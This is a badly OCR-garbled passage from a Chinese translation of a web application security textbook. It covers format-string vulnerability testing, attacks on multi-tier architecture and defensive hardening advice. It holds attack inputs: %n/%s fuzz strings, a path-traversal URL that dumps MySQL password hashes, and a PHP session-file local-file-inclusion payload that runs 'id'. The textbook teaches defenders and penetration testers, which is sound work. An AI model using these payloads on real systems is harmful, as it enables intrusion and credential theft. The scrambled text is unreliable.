意 代 码 。 由 于 攻击 者 控制 着 格式 化 字符 串 ， 所 以 他 能 够 控制 函数 输出 的 
字 贡 数量 以 及 栈 上 被 输入 的 字 节 数量 重 写 的 指针 。 这 样 ， 攻 击 者 就 能 够 
重 写 一 个 已 保存 的 返回 地 址 或 者 一 个 指向 异 第 处 理 占 的 指针 ， 进 而 控制 
代码 执行 ， 束 像 在 栈 溢出 中 一 样 。 


查找 格式 化 字符 串 漏洞 











在 远程 应 用 程序 中 探查 格式 化 字符 串 漏 洞 的 最 有 效 方法 是 ， 提 交 包 
含 各 种 格式 说 明 符 的 数据 ， 并 监控 应 用 程序 的 任何 反常 行为 。 与 不 受 控 
制 地 触发 缓冲 区 洲 出 漏洞 可 能 造成 的 后 果 一 样 ， 在 一 个 易 受 攻击 的 应 用 
程序 中 探查 格式 化 字符 串 漏 洞 可 能 会 导致 系统 衣 温 。 


渗透 测试 步 又 


D 轮流 问 每 个 目标 参数 提交 包含 大 量 格 式 化 说 明 符 %n 与 %s 
的 字符 串 : 


Snsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsnsn 








woe 相反 ， > MEHR LINN 
数 ， 如 果 应 用 程序 易于 受到 攻击 ， 残 可 能 会 导致 非法 访问 。 

(2) Windows FormatMessage 函 数 以 一 种 不 同 的 方式 使 用 printf 
系列 函数 中 的 说 明 符 。 为 测试 调用 这 个 函数 是 否 易 于 受到 攻击 ， 应 
该 使 用 以 下 字符 串 : 


KELINISS nls 3 in!i$gda ni% SIini$s6lnis 7 In!'SStn!FGInit&1LOItn! etc... 





41!5s!32!1s133!1s!%4!9s135195!36!5!37!s!138!1s139!5!1310!s! etc... 
(3) 记得 将 % 字 符 URL 编 码 成 %25。 
(4) 与 上 述 查 找 缓冲 区 溢出 漏洞 时 一 样 ， 应 该 监控 应 用 程序 
啊 应 中 出 现 的 反常 事件 。 


16.4 小结 


与 针对 Web 应 用 程序 的 攻击 相 比 ， 本 地 代码 中 的 软件 漏洞 造成 的 威 
胁 相 对 较 小 。 大 多 数 应 用 程序 在 托管 执行 环境 下 运行 ， 本 章 描 述 的 典型 
软件 漏洞 并 不 会 发 生 。 然 而 ， 有 些 时 候 ， 这 类 漏洞 可 能 会 频繁 发 生 ， 并 
影响 到 许多 在 硬件 设备 与 其 他 非 托 管 环境 下 运行 的 Web 应 用 程序 。 癌 服 
务 絮 提交 一 组 特殊 的 测试 字符 串 并 监控 其 啊 应 ， 即 可 发 现 大 多 数 软件 漏 
洞 。 

本 地 应 用 程序 中 的 一 些 漏 洞 “如 本 章 描 述 的 “一 位 偶 移 ?漏洞 ) 相对 
较 易 被 攻击 者 利用 。 但 是 ， 许 多 时 候 ， 由 于 攻击 者 只 能 远程 访问 易 受 攻 
击 的 应 用 程序 ， 利 用 它们 就 变 得 非常 困难 。 

与 查找 大 多 数 其 他 类 型 的 Web 应 用 程序 漏洞 不 同 ， 如 宋 应 用 程序 易 
受 攻 击 ， 即 使 是 在 其 中 探查 典型 的 软件 漏洞 也 可 能 会 导致 拒绝 服务 风 
险 。 因 此 ， 在 进行 这 种 测试 前 ， 必 须 确保 应 用 程序 所 有 者 接受 与 其 相关 
的 潜在 风险 。 














16.5 ”问题 


欲 知 问题 答案 ， 请 访问 http:/mdsec. net/wahh. 
C1) 如 果 不 采 用 特殊 的 防御 措施 ， 为 什么 栈 绥 神 区 溢出 比 堆 溢出 
更 容易 被 攻击 者 利用 ? 
(2) 在 C 与 Ct+ 语 言 中 ， 字 符 串 的 长 度 如 何 决 定 ? 
(3) 与 在 因特网 上 运行 的 所 有 权 Web 应 用 程序 中 存在 的 洲 出 漏洞 
ee ee eee eee 
中 用? 
(4) 下 面 的 模糊 漏洞 字符 串 为 什么 无 法 确定 许多 格式 化 字符 串 漏 
y? 





S$n$én$nsntnsn$ntnsn$nsnsnsn$ntnsn$nsn$sntn$ntnsn$ntnsntnsntnsn... 


(5) 假设 在 一 个 大 量 使 用 本 地 代码 组 件 的 web 应 用 程序 中 探查 组 
证 区 溢出 漏洞 ， 发 现 了 某 个 请 求 的 一 个 参数 可 能 存在 漏 调 ， 然 而 无 法 让 
监控 到 的 有 反常 行为 再 次 发 生 。 有 时 ， 提 交 一 个 长 度 较 长 的 值 会 立即 造成 
系统 骨 沉 ， 有 了 时 则 需要 重复 提交 几 次 才能 导致 朋 江 。 为 外 ， 如 果 提 交大 
量 “ 民 性 ”请 求 也 会 引起 系统 崩 尝 。 

什么 原因 最 有 可 能 导致 应 用 程序 出 现 这 种 行为 ? 

















M big-endian 和 little-endian 是 用 来 表述 一 组 有 序 的 字 节 数 存放 在 计算 机 
内 存 中 时 的 顺序 的 术语 。big-endian 是 将 高 位 字 节 (序列 中 最 重要 的 
值 ) 先 存放 在 高 地 址 处 的 顺序 ， 而 little-endian 是 将 低位 字 节 (序列 中 最 
不 重要 的 值 ) 先 存放 在 低地 址 处 的 顺序 。 译 者 注 
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党 评估 某 个 应 用 程序 的 安全 状态 时 ，Web 应 用 程序 架构 经 常 被 名 
略 ， 但 实际 上 它 古 一 个 重要 的 安全 领域 。 在 常用 的 分 层 架 构 中 ， 如 果 无 
法 隔离 不 同 的 层次 ， 攻 击 者 束 可 以 利用 某 个 层次 中 的 一 个 漏洞 完全 攻破 
其 他 层次 ， 进 而 控制 整个 应 用 程序 。 

如 果 多 个 应 用 程序 在 相同 的 基础 染 构 上 运行 ， 或 者 共有 至 一 个 用 途 更 
广泛 的 支配 型 应 用 程序 的 公共 组 件 ， 这 些 环境 也 会 造成 其 他 不 同类 型 的 
安全 戌 胁 。 在 这 些 情况 下 ， 攻 击 者 有 时 可 能 利用 应 用 程序 中 的 漏洞 或 恶 
意 代 码 攻破 整个 环境 以 及 其 他 属于 不 同 客户 的 应 用 程序 。 最 近 流 行 
的 “ 云 计算 ?增加 了 许多 组 织 遭 受 此 类 攻击 的 可 能 性 。 

本 章 讨 论 一 系列 不 同类 型 的 架构 配置 ， 并 说 明 如 何 利用 应 用 程序 染 
构 中 存在 的 缺陷 扩大 攻击 范围 。 

















17.1 DERK 





许多 Web 应 用 程序 使 用 多 层 架 构 ， 在 这 个 架构 中 ， 应 用 程序 用 户 界 
面 、 业 务 罗 和 辑 与 数据 存储 分 别 位 于 不 同 的 层次 中 ， 这 些 层 次 可 能 采用 各 
MAR, 并 在 不 同 的 计算 机 上 运行 。 一 个 党 用 的 三 层 架 构 可 分 为 以 下 层 
WR: 

口 展现 层 ， 执 行 应 用 程序 的 界面 ; 

a 应 用 程序 层 ， 执 行 核心 应 用 程序 逻辑 ; 

口 数据 库 层 ， 存 储 并 处 理应 用 程序 数据 。 

实际 上 ， 许 多 复杂 的 企业 应 用 程序 对 不 同 层次 进行 更 详细 的 划分 。 
例如 ， 一 个 基于 Java 的 应 用 程序 可 能 采用 以 下 层次 与 技术 : 

a 应 用 程序 服务 器 层 〈 例 如 Tomcat) ; 

口 展现 层 〈 例 如 WebWork) ; 

口授 权 与 验证 层 〈 例 如 JAAS 或 ACEGI) ; 

口 核心 应 用 程序 框架 《例如 Struts 或 Spring) ; 

口 业务 逻辑 层 ( 例 如 Enterprise Java Beans) ; 

口 数 据 库 对 象 关系 映射 〈 例 如 Hibernate) ; 

口 数 据 库 JDBC 调 用 ; 

口 数 据 库 服 务 器 。 

与 单 层 设计 相 比 ， 多 层 架 构 具 有 诸多 优点 。 与 大 多 数 软件 设计 方法 
一 样 ， 将 高 度 复杂 的 处 理 任务 分 解 成 简单 、 模 块 化 的 功能 组 件 ， 能 够 显 
著 改 善 应 用 程序 开发 管理 并 降低 漏洞 的 友 生 率 。 拥 有 明确 定义 界面 的 独 
立 组 件 可 在 不 同 的 应 用 程序 内 及 应 用 程序 之 间 重 复 使 用 。 不 同 的 开发 者 
可 以 并 行 开发 不 同 的 组 件 ， 而 不 必 深 入 了 解 其 他 组 件 的 执行 细节 。 如 果 
有 必要 替换 一 个 层次 使 用 的 技术 ， 葵 换 过 程 也 不 会 给 其 他 层次 造成 严重 
男 外 ， 如 果 运 用 合理 ， 多 层 架 构 可 显著 改善 整个 应 用 程序 的 安全 





























17.1.1 攻击 分 层 架 检 


前 面 的 分 析 结 果 表 明 ， 如 末 一 个 多 层 染 构 的 执行 过 程 存 在 缺陷 ， 这 
些 缺 陷 可 能 会 引入 安全 漏洞。 了 解 多 层 模型 可 帮助 渗透 测试 员 人 确定 实施 
各 种 安全 防御 (如 访问 控制 与 输入 确认 〉 的 位 置 ， 以 及 如 何 穿越 层次 边 
界 来 破坏 这 些 防御 ， 从 而 对 Web 应 用 程序 实施 有 效 攻击 。 设 计 不 佳 的 分 
层 染 构 可 能 受到 以 下 3 种 类 型 的 攻击 。 





4 P ele gn E prt POEL 
一 个 层 。 
口 如 宋 不 同 层 之 间 没 有 完全 隅 离 ， 就 可 以 利用 茶 一 层 存 在 的 缺陷 直 
接 破 坏 力 一 层 实 施 的 安全 保护 。 
口 局 部 攻破 一 个 层 后 ， 就 可 以 直接 攻击 其 他 层 的 基础 染 构 ， 从 而 将 
攻击 扩大 到 其 他 层 。 

下 面 逐 一 详细 介绍 这 些 攻击 。 
1. 利用 层 之 间 的 信任 关系 

应 用 程序 的 不 同 层 之 间 彼 此 信任 ， 并 以 特殊 的 方式 运转 。 如 果 应 用 
程序 运行 正常 ， 这 些 假设 就 有 效 。 然 而 ， 在 反常 情况 下 或 者 应 用 程序 正 
受到 攻击 时 ， 上 述 假设 就 会 被 打破 。 这 时 渗透 测试 员 就 可 以 利用 这 些 信 
任 关 系 将 攻击 范围 由 一 个 层 扩 大 到 另 一 个 层 ， 增 加 安全 违反 的 严重 程 


度 。 

许多 企业 应 用 程序 中 存在 一 种 十 分 常见 的 信任 关系 ， 即 某 个 应 用 程 
序 层 专门 负责 管理 用 户 访问 。 这 个 层 实 施 验证 与 会 话 管理 ， 并 执行 各 种 
逻辑 ， 决 定 是 否 准 予 某 个 特殊 的 请 求 。 如 果 该 应 用 程序 层 决定 准予 一 个 
请 求 ， 它 束 同 其 他 层 发 出 相关 命令 ， 以 执行 被 请 求 的 操作 。 其 他 层 相 信 
准予 请 求 的 应 用 程序 层 ， 认 为 它 已 经 实施 了 严格 的 访问 控制 检查 ， 因 而 
执行 它们 从 该 应 用 程序 层 收 到 的 全 部 命令 。 

这 种 类 型 的 信任 关系 会 加 速 恶 化 我 们 在 前 面 章 节 中 讨论 的 许多 常见 
的 web 漏洞 。 如 果 应 用 程序 中 存在 SQL 注入 漏洞 ， 攻 击 者 束 可 以 利用 
它 访问 应 用 程序 中 的 所 有 数据 。 即 使 应 用 程序 并 不 以 数据 库 管 理 员 的 号 
份 访问 数据 库 ， 它 通常 也 会 使 用 一 个 能 够 读 取 并 更 新 所 有 应 用 程序 数据 
Se ea renee ee 
ESP JE 

同样 ， 应 用 程序 组 件 通 常 使 用 较 高 权限 的 操作 系统 账户 运行 ， 这 些 
账户 能 够 执行 敏感 操作 并 访问 关键 文件 。 在 这 种 配置 下 ， 操 作 系 统 层 完 
全 信任 相关 应 用 程序 层 ， 认 为 它 不 会 执行 有 害 操 作 。 如 果 攻 击 者 发 现 一 
个 命令 注入 漏洞 ， 在 利用 它 攻 破 应 用 程序 层 后 ， 他 们 还 可 以 进一步 完全 
攻破 为 应 用 程序 层 提 供 文 持 的 基础 操作 系统 。 

层 之 间 的 信任 关系 还 可 能 导致 其 他 问题 。 如 果 一 个 应 用 程序 层 存 在 
编程 错误 ， 那 么 这 些 错 误 可 能 会 导致 其 他 层 出 现 反常 行为 。 例 如 ， 第 
11 章 描述 的 竞 态 条 件 导 致 后 端 数据 库 提供 属于 错误 用 户 的 账户 信息 。 
而 且 ， 如 果 管 理 员 正在 调查 一 起 意外 事件 或 安全 违反 行为 ， 只 通过 查阅 
信任 层 中 的 审计 日 志 通 常 并 不 足以 帮助 他 们 完全 了 解 事件 的 整个 发 生 过 
程 ， 因 为 他 们 只 能 确定 可 信 层 是 引发 事件 的 媒介 。 例 如 ， 发 生 SQL 注 
入 攻击 后 ， 数 据 库 日 志 可 能 会 记录 攻击 者 注入 的 每 一 个 查询 ， 但 要 确定 


















































哪 一 名 用 户 是 攻击 者 ， 还 必须 将 这 些 事件 与 应 用 程序 层 中 的 日 志 记录 进 
行 区 叉 参 考 ， 因 为 通过 日 志 记录 无 法 确定 攻击 者 。 
2. 破坏 其 他 层 

如 琳 应 用 程序 的 不 同 层 之 间 没 有 完全 隅 离 ， 那 么 攻破 一 个 层 的 攻击 
者 就 可 以 直接 破坏 另 一 个 层 实施 的 安全 保护 ， 从 而 执行 这 个 层 负责 控制 
的 操作 或 访问 其 中 的 数据 。 

如 末 几 个 层 在 相同 的 计算 机 上 执行 ， 那 么 这 时 往往 会 出 现 漏 洞 。 为 
节省 成 本 ， 许 多 应 用 程序 常 音 采 用 这 种 架构 配置 。 

9 访问 解密 算法 

通常 ， 为 满足 PCI 等 管理 或 法 规 要 求 ， 许 多 应 用 程序 都 会 对 敏感 的 
用 户 数据 进行 加 蜜 ， 以 最 大 限度 地 降低 应 用 程序 被 攻破 造成 的 影响 。 虽 
然 可 以 对 密码 进行 “加 salt 散 列 ? 处 理 ， 以 确保 即使 数据 存储 被 攻破 ， 攻 
击 者 仍然 无 法 确定 密码 ， 但 对 于 应 用 程序 需要 将 其 恢复 为 明文 值 的 数 
据 ， 则 需要 采用 不 同 的 处 理 方法 。 关 于 这 类 数据 ， 最 常见 的 示例 包括 用 
户 的 安全 问题 “可 以 通过 与 服务 合 进行 交互 来 确认 ) Act Ria CE 
付 球 时 需要 这 些 信息 ) 。 为 此 ， 需 要 采用 茶 种 双向 加 密 算法 。 使 用 加 密 
时 出 现 的 典型 漏 调 是 : 加 密 密 钥 与 加 密 数 据 之 间 未 进行 逻辑 隅 离 。 在 现 
有 环境 中 使 用 加 密 时 ， 一 种 简单 但 存在 缺陷 的 隔离 方法 ， 是 将 算法 和 相 
关 密 钥 置 于 数据 层 ， 以 避免 影响 到 其 他 代码 。 但 是 ， 如 果 数 据 层 也 被 攻 
破 〈 例 如 ， 通 过 SQL 注入 攻击 ) ， 攻 击 者 将 可 以 轻松 确定 并 执行 解密 功 
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> 注解 无 论 以 何 种 方法 进行 加 密 ， 只 要 应 用 程序 能 够 解密 

言 思 ， 并 且 应 用 程序 被 完全 攻破 ， 攻 击 者 总 是 能 够 确定 解密 算法 的 

逻辑 路 径 。 


9 使 用 文件 读 取 访 问 权 限 提 取 MySQL 数 据 

许多 小 型 应 用 程序 使 用 一 个 LAMP 服 务 器 (运行 Linux、Apache、 
MySQL 和 PHP 等 开源 软件 的 独立 计算 机 ) 。 在 这 种 架构 中 ， 如 果 Web 
应 用 程序 层 中 的 一 个 文件 泄露 漏洞 ， 其 本 里 并 不 会 造成 严重 的 缺陷 ， 但 
却 可 以 导致 攻击 者 无 限制 地 访问 应 用 程序 的 所 有 数据 ， 因 为 MySQL 数 
据 保 存在 可 读 的 文件 中 ， 且 Web 应 用 程序 进程 通 党 有 权 读 取 这 些 文件 。 
即使 数据 库 对 它 的 数据 实施 了 严格 的 访问 控制 ， 而 且 应 用 程序 使 用 一 系 
列 低 权 限 的 账户 连接 数据 库 ， 但 如 果 攻 击 者 能 够 直接 访问 保存 在 数据 库 
层 中 的 数据 ， 他 仍然 可 以 完全 避 开 这 些 保 护 。 











例如 ， 图 17-1 所 示 的 应 用 程序 允许 用 户 选 择 一 种 皮肤 ， 自 定义 他 们 
的 使 用 体验 。 这 要 求 用 户 选 择 一 个 层 靶 样式 表 (Cascading Style Sheet, 
CSS) 文件 ， 并 且 应 用 程序 会 将 这 个 文件 呈现 给 用 户 审 查 。 


È hatpey//wahh-love/mdsvecportal/ custornise?css- basx.css 


Site Skin Chooser 


Please review the following file for use in the current site skin: 


body {position relative; background white; margin: 0; padding 0; left 0; } dintinks {position: absolute; top: 150px; left 0; 
width: 166px; height 700px, font: 16px Verdana, sans-serif, z-index: 100. diveinks a (display: block: text-align: center; font: l= 
bold lem sums-sent, padding Spx 10p margin U U Ipx; border-width 0; text-decoration none, color. FEC, background 
#444, border-right: Spx sobd #505050.} divwinks ahover {color #411, background #AAA, border-right Spx double 
white;} divimks a span {disphy- none;} dvřlinks ahover span {display: block: position absolute; top: 60px: left 420; 
width: 300px padding Spx: margm 10px: z-index: 100: color: #000066; background: white; font 14px Verdana, sans-sent 
text-aligx center} divtlinks a ang {height 0; width: 0; border-width 0;} divWlinks ahover img {position absolute; top: 
180px, lef: 40px, height 100px, width: 100px} divécontent (position absolute, top: 150px, left 180px, rgbt 25px, color 
#000066; background: white; font: 12px Verdana, sans-senf, padding 10px; border: sold Opx #444;} div#content p 
{margin O lem lem;} divcoment h3 (margin-bomon: 0.25¢m;} hl (margin: -19px -Opx 0. Sem; padding: 1 Spx 0 Spx; text- 
align: left; background: white, color: 667, letter-spacing: 0. Lem, font: bold 25px sans-serif, height: 28px; vertical-align 
middie; white-space: cowrap;} dt {font-weight bold} dd (margin-bottom: 0.66em;} code, pre (color: SEDC; font: 110% 
monospace;} divefooter [posticrabsolute; bottom; color *BAA; font: 13px Verdana, sans-serf, padding: 10px; top:auto; 


leftanto; } 





ct = 


图 17-1 一 个 包含 查看 选中 文件 功能 的 应 用 程序 








如 果 这 个 功能 包含 一 个 路 径 遍 历 漏 洞 〈 请 参阅 第 10 章 了 解 相 关内 
容 ) ， 那 么 攻击 者 就 可 以 利用 这 个 漏洞 直接 访问 保存 在 MyYSQL 数 据 库 
中 的 任意 数据 ， 从 而 破坏 在 数据 库 层 实 施 的 访问 控制 。 图 17-2 显 示 了 一 
个 从 MySQL 用 户 表 中 成 功 获 取 用 户 名 和 密码 散 列 的 攻击 。 

















pon) fe re 
€) 局 http://webh-live/mdsecportel/ customise? cas= ddd dl A dob/ ysg myag use MVE P- R+x| 


Site Skin Chooser 


Please review the following file for use in the current site skin 


0Ua 

localhostroot*276EA2 {7ESB2 76CDBC6A06DF ABOE3 1F9D127CFES4 ORimbanhroot® 276EA27ESB276CDBC6A06DFA 
DOU 127.0.0.lroot*276KAL7ESB276CDBC6A06DEABUKS 1F9D1 27CFESS\0)9 localhost NUUA yubuntn 000 Oa 
localhostdebian sys maint* 7BIA91EA1D345BE3F SES2FF 8FD33DFF2SCA0S6CF Ny 192.168. 1 Lroot0\ NOW 

192. 168.1 droot*276EA27ESB276CDBC 6A0GDFABOES1F9D12 ICFE8S$ 00M% 

wahh* 7EGIBE92C6S5ES4D0C43CSFD9D45342325A9F 54 14 OU DF M1000 0000 

localhostwabh* 7E64BE92C6SES4B0C \0243CSFD9D45342325A9FS414\0.0:0¥8 

192.168.224 lroot*276EA27ESB276CDBC6A05DFABOE3 1 F9D127CFES4\0P 00% 

labuser*A 7OEAD6D6BA6DC9CS | 23992FODB48DB 1SCBICDIOOXN Oa 

localhostlabuser* AT0EAOSDEBAGDC9C $123992FODB48DB13CB3CD1C 





图 17-2 “MDB, RE h 








W 提示 “如 果 攻 击 者 具有 文件 写 入 访问 权限 ， 就 可 以 尝试 对 
应 用 程序 的 配置 或 托管 的 虚拟 目录 执行 写 入 操作 ， 以 执行 相关 合 
令 。 请 参阅 第 10 章 的 nslookup 示 例 。 


o 使 用 本 地 文件 包含 执行 命令 

许多 语言 都 包含 用 于 在 当前 脚本 中 包含 本 地 文件 的 函数 。 如 果 攻 击 
者 能 够 指定 文件 系统 上 的 任何 文件 ， 这 无 疑 是 一 个 严重 的 问题 。 此 类 文 
件 可 能 为 /etc/passwd 文 件 或 包含 密码 的 配置 文件 。 很 明显 ， 这 些 情况 会 
导致 信息 披露 ， 但 攻击 者 不 一 定 能 够 扩大 攻击 范围 ， 以 进一步 攻破 整个 
系统 (如 第 10 章 所 述 ， 通 过 远程 文件 包含 无 法 达到 这 一 日 的 ) 。 不 过 ， 
攻击 者 仍然 可 以 利用 其 :但 应 用 程序 或 平台 功能 ， 通 过 包含 一 个 内 容 部 分 
受 其 控制 的 文件 来 执行 命令 。 

例如 ， 某 应 用 程序 在 以 下 URL 的 country 参 数 中 提交 用 户 输入 : 

http://eis/mdsecportal/prefs/preference_2?country=en-gb 


用 户 可 以 修改 country 参 数 来 包含 任意 文件 。 一 个 可 能 的 攻击 是 ， 请 求 包 














含 脚 本 命令 的 URL， 以 便 将 这 些 命令 写 入 Web 服 务 絮 日 志文 件 ， 然 后 使 
用 本 地 文件 包含 行为 包含 这 个 日 志文 件 。 
一 种 利用 PHP 体 系 架构 怪癖 的 有 趣 方法 ， 是 以 明文 形式 将 PHP 会 话 
变量 写 入 使 用 会 话 令 牌 命名 的 文件 中 。 例 如 ， 以 下 文件 : 
/var/lib/php5/sess_9ceed0645151b31a494f4e52dabd0ed7 
可 能 包含 下 列 内 容 ， 其 中 包含 用 户 配置 的 昵称 : 


logged_in|i:1;id|]s:2:"24" ;username|s:11:"“manicsprout*;nickname|s:22: 





"msp";privilege|s:1:"1"; 


攻击 者 可 以 对 这 种 行为 加 以 利用 。 首 先 ， 他 将 自己 的 昵称 设置 为 <? 
php passthru(id);?>， 如 图 17-3 所 示 。 然 后 ， 他 包含 会 话 文 件 ， 使 用 以 下 
URL 执 行 id 命令 ， 如 图 17-4 所 示 。 


a |G http://wahh-five/suth/Profile 


normal user 


username: monicsprout 
nickname: <?php passthrulid); ?> 
email: host@wahh-lve com 
ext: x0001 

password: d4id3cd9Si00b204e930 


Update 





图 17-3 ”配置 包含 服务 器 可 执行 的 脚本 代码 的 昵称 






select Gefsult country cose 


COS DAt tO: dd of alot afd af war/lib/ phps sess, 9eeed0645 151b3 10494145 2dabd0ed7\0 
22°24" ;usermame js: 5 is" maniceprout’ ;rackname)s:22: "uid + 33(wew-data) gad + 33(www-data) grouss~33(www-data) “}prwiege|s:1:°1"; 


图 17-4 通过 本 地 文件 包含 功能 执行 包含 恶意 昵称 的 会 话 文件 














http: //eis/mdsecportal/prefs/preference_2.php?country=../../../../../.. 


../../var/lib/phps/sess_9ceed0645151b31a4194f4e52dabad0ed7309 


渗透 测试 步 又 


D 对 于 在 应 用 程序 中 己 确 定 的 任何 漏洞 ， 应 发 挥 想 象 ， 考 
碟 如 何 利 用 这 个 漏洞 实现 渗透 测试 目标 ， 这 是 贯 罕 全 书 的 主题 。 无 
数 针 对 Web 应 用 程序 实施 的 成 功 攻击 ， 节 初 都 是 从 利用 一 个 内 部 影 
啊 有 限 的 漏洞 开始 的 。 通 过 利用 信任 关系 并 破坏 应 用 程序 其 他 地 方 
实施 的 控制 ， 渗 透 测 试 员 就 有 可 能 利用 一 个 看 似 细微 的 缺陷 ， 实 施 
严重 的 攻击 。 

(2) 如 果 能 在 任何 应 用 程序 组 件 上 执行 任意 命令 ， 并 能 够 与 
其 他 主机 建立 网 络 连 接 ， 应 考虑 问 网 络 与 操作 系统 层面 中 的 应 用 程 
序 其 他 基础 架构 发 动 直 接 攻击 ， 以 扩大 攻击 范围 。 





17.1.2 ”保障 分 层 架 构 的 安 





如 果 以 严谨 的 方式 执行 多 层 架 构 ， 该 架构 束 可 以 显著 提高 应 用 程序 
的 安全 ， 因 为 它 能 够 将 一 次 成 功 攻击 的 影响 控制 在 局 部 。 在 前 面 描述 的 
基本 LAMP 配 置 中 ， 所 有 组 件 都 在 一 台 计 算 机 上 运行 ， 攻 破 其 中 一 个 层 
就 可 能 导致 整个 应 用 程序 被 完 全 攻破 。 在 更 安全 的 架构 中 ， 攻 击 者 攻破 
一 个 层 ， 只 能 部 分 控制 应 用 程序 的 数据 与 处 理 操 作 ， 因 而 其 造成 的 影响 
有 限 ， 可 能 仅 局 限于 被 攻破 的 层 中 。 

1. 尽量 减少 信任 关系 

每 个 层 应 尽 可 能 实施 自己 的 控制 ， 防 止 未 授权 操作 ; 并 不 得 信任 其 
他 应 用 程序 组 件 ， 以 阻止 该 层 可 能 有 助 于 防御 的 安全 违反 。 以 下 是 将 这 
个 原则 应 用 于 不 同 应 用 程序 层 的 一 些 实例 。 

口 应 用 程序 服务 器 层 应 对 特殊 的 资源 与 URL 路 径 实施 基于 角色 的 
访问 控制 。 例 如 ， 应 用 程序 服务 器 应 核实 所 有 访问 /admin 路 径 的 请 求 均 
由 管理 用 户 提出 ， 也 可 以 对 各 种 资源 《如 特殊 类 型 的 脚本 与 静态 资源 ) 
实施 访问 控制 。 这 样 做 可 以 减轻 Web 应 用 程序 层 存在 的 某 些 访问 控制 缺 
陷 造 成 的 影响 ， 因 为 如 宁 用 户 无 权 访 问 菜 些 功能 ， 那 么 他 们 提出 的 请 求 
在 到 达 这 个 层 之 前 吏 已 经 被 阻止。 

口 数据库 服务 器 层 可 以 为 应 用 程序 的 不 同 用 户 和 操作 提供 各 种 权限 
的 账户 。 例 如 ， 可 以 给 未 通过 验证 的 用 户 分 配 一 个 只 读 访问 权限 的 低 权 
































限 账户 ， 且 该 账户 只 能 访问 一 部 分 数据 。 至 于 已 通过 验证 的 不 同类 型 的 
用 户 ， 可 以 同 他 们 分 配备 种 数据 库 账 户 ， 并 根据 用 户 的 角色 ， 人 允许 其 读 
取 和 写 入 不 同 的 应 用 程序 数据 。 这 样 做 可 以 减轻 许多 SQL 注入 漏洞 造成 
的 影响 ， 因 为 即使 攻击 取得 成 功 ， 攻 击 者 也 只 能 访问 用 户 合法 使 用 应 用 
程序 时 所 能 获得 的 数据 。 

口 所 有 应 用 程序 组 件 可 以 使 用 拥有 正常 操作 所 需 的 最 低 权 限 的 操作 
系统 账户 运行 。 这 样 做 可 以 减轻 这 些 组 件 中 存在 的 任何 命令 注入 或 文件 
访问 漏洞 造成 的 影响 。 在 设计 合理 并 得 到 充分 强化 的 架构 中 ， 攻 击 者 就 
无 法 利用 这 种 漏洞 访问 敏感 数据 或 执行 未 授权 操作 。 

2. 隔离 不 同 的 组 件 

应 尽 可 能 地 将 每 个 层 隔 离开 来 ， 避 免 它 们 在 无 意 间 彼 此 交互 。 为 实 
现 这 个 目标 ， 有 些 时 候 可 能 需要 在 不 同 的 主机 上 运行 不 同 的 组 件 。 以 下 
是 应 用 这 个 原则 的 一 些 实例 。 

口 一 个 层 不 得 读 取 或 写 入 其 他 层 使 用 的 文件 。 例 如 ， 应 用 程序 层 不 
得 访问 任何 用 于 保存 数据 库 数 据 的 物理 文件 ， 它 只 能 通过 一 个 适当 权限 
的 用 户 账户 ， 以 指定 的 方式 使 用 数据 库 查 询 访问 这 些 数据 。 

口 对 不 同 基 础 架构 组 件 之 间 的 网 络 级 访问 进行 过 滤 ， 仅 允许 需要 与 
不 同 应 用 程序 层 彼此 通信 的 服务 。 例 如 ， 执 行 应 用 程序 主要 还 辑 的 服务 
器 只 能 通过 用 于 进行 SQL 查询 的 端口 与 数据 库 服务 器 交互 。 这 种 防范 
并 不 能 阻止 利用 这 种 服务 针对 数据 库 层 的 攻击 ， 但 它 能 够 阻止 以 数据 库 
服务 器 为 对 象 的 基础 架构 攻击 ， 并 且 能 够 防止 攻破 操作 系统 的 攻击 者 到 
达 组 织 的 内 部 网 络 。 

3. 应 用 深层 防御 

根据 架构 所 使 用 的 技术 ， 我 们 可 以 在 架构 的 不 同 组 件 内 实施 各 种 保 
护 措施 ， 以 达到 将 某 个 成 功 攻击 的 影响 限制 在 局 部 的 目的 。 以 下 是 实施 
这 些 控制 的 一 些 实例 。 

口 应 根据 配置 与 漏洞 补丁 ， 把 每 台 主机 上 的 技术 栈 的 各 个 层面 进行 
安全 强化 。 如 果 服 务 器 的 操作 系统 存在 缺陷 ， 那 么 拥有 低 权 限 账 户 的 攻 
击 者 就 可 以 利用 一 个 命令 注入 漏洞 提升 自己 的 权限 ， 从 而 完全 控制 整个 
服务 器 。 如 果 其 他 主机 没有 得 到 强化 ， 这 种 攻击 就 可 能 会 在 整个 网 络 中 
扩散 。 另 一 方面 ， 如 果 基 础 服务 器 安全 可 靠 ， 攻 击 造 成 的 影响 会 被 完全 
局 限 在 一 个 或 几 个 应 用 程序 层 中 。 

口 应 对 保存 在 任何 应 用 程序 层 中 的 数据 进行 加 密 ， 以 防止 攻破 该 层 
的 攻击 者 轻松 获得 这 些 数 据 。 用 户 证 书 和 其 他 敏感 信息 (如 信用 卡 
号 ) ， 应 以 加 密 形式 保存 在 数据 库 中 。 如 有 可 能 ， 应 使 用 内 置 保护 机 制 
保护 保存 在 Web 应 用 程序 层 中 的 数据 库 证 书 。 例 如 ， 在 ASP.NET 2.0 
中 ， 加 密 的 数据 库 连 接 字符 串 可 保存 在 web.config 文件 中 。 






































许多 组 织 通 过 外 部 提供 商 辐 公众 提供 他 们 的 Web 应 用 程序 。 这 些 服 
务 包括 组 织 通 过 其 访问 Web 与 数据 库 服 务 器 的 简单 主机 服务 ， 以 及 代表 
组 织 主动 维护 应 用 程序 的 成 熟 应 用 程序 服务 提供 商 (Application Service 
Provider, ASP) 。 人 缺乏 能 力 与 资源 部 署 自己 的 应 用 程序 的 小 型 企业 党 
a a 


EFF o 

大 多 数 Web 与 应 用 程序 主机 服务 提供 丙 拥有 众多 客户 ， 且 种 向 使 用 
相同 的 基础 架构 或 者 紧密 相连 的 基础 架构 支持 许多 客户 的 应 用 程序 。 因 
此 ， 选 择 使 用 其 中 一 种 服务 的 组 织 必 须 考虑 以 下 相关 威胁 。 
0 

O 一 名 不 知情 的 客户 可 能 部 署 一 个 易 受 攻击 的 应 用 程序 ， 使 得 恶意 
客户 能 够 攻破 共 至 的 基础 架构 ， 从 而 攻击 组 织 的 应 用 程序 及 其 数据 。 

在 共有 至 系统 中 运行 的 Web 站 点 是 企图 丑化 尽 可 能 多 的 Web 站 所 
的 “脚本 小 子 ” 的 主要 攻击 目标 ， 因 为 只 要 攻破 一 台 共 至 主机 ， 他 们 就 能 
在 短期 内 向 数 百 台 明显 自治 的 Web 站 点 实施 攻击 。 


17.2.1 EMA 


